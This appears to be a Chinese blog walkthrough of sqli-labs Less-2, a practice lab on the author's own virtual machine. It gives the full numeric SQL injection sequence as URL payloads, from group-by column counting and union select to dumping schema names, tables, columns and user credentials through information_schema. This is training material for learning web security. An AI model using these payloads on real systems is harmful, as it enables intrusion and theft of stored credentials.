当前位置: 首页 > article >正文

sqli-labs靶场第二关less-2

sqli-labs靶场第二关less-2

本次测试在虚拟机搭建靶场,从主机测试在这里插入图片描述

1、输入?id=1和?id=2发现有不同的页面回显

2、判断注入类型

http://192.168.128.3/sq/Less-2/?id=1’

在这里插入图片描述

从回显判断多一个‘ ,预测可能是数字型注入

输入

http://192.168.128.3/sq/Less-2/?id=1 and 1=1
http://192.168.128.3/sq/Less-2/?id=1 and 1=2

发现and 1=1 正常回显,and 1=2 回显错误,确定数字型注入

3、确定列数

http://192.168.128.3/sq/Less-2/?id=1 group by 5

在这里插入图片描述

http://192.168.128.3/sq/Less-2/?id=1 group by 4

在这里插入图片描述

http://192.168.128.3/sq/Less-2/?id=1 group by 3

在这里插入图片描述

group by 3 的时候回显正常,确定有三列。

4、确定回显位

http://192.168.128.3/sq/Less-2/?id=-1 union select 1,2,3
在这里插入图片描述

2.3位为回显位

5、查询数据库名和版本

http://192.168.128.3/sq/Less-2/?id=-1 union select 1,database(),version()

在这里插入图片描述

6、爆出数据库名

http://192.168.128.3/sq/Less-2/?id=-1 union select 1,group_concat(schema_name),3 from information_schema.schemata

在这里插入图片描述

7、爆出表名

http://192.168.128.3/sq/Less-2/?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=‘security’

在这里插入图片描述

8、爆出列名

http://192.168.128.3/sq/Less-2/?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=‘security’ and table_name=‘users’

在这里插入图片描述

9、爆出数据

http://192.168.128.3/sq/Less-2/?id=-1 union select 1,group_concat(username,‘~’,password),3 from security.users

在这里插入图片描述
** 大功告成**


http://www.kler.cn/news/337047.html

相关文章:

  • 在macOS上进行开发环境配置与应用开发详细的配置指南
  • k8s 之安装busybox
  • 【Python】Python知识总结浅析
  • 【SQL】掌握SQL查询技巧:数据筛选与限制
  • whereis命令:查找命令的路径
  • swift使用internvl2微调ocr文字检测(目标检测)
  • RabbitMQ(学习前言)
  • sqli-labs靶场第八关布尔盲注通关
  • MySQL 创建数据表
  • ctf.bugku - 本地管理员
  • SOMEIP_ETS_167: SD_TestFieldUINT8Array
  • 【WPF开发】如何设置窗口背景颜色以及背景图片
  • 基于深度学习的化学反应预测
  • 昇思MindSpore进阶教程--自动数据增强
  • 前端编程艺术(4)---JavaScript进阶(vue前置知识)
  • 机器学习——自监督学习与无监督学习
  • 基于PSO粒子群优化的多无人机路径规划matlab仿真,对比WOA优化算法
  • LeetCode 11 Container with Most Water 解题思路和python代码
  • Node.js+Express毕设论文选题最新推荐题目和方向
  • keras yolo8目标检测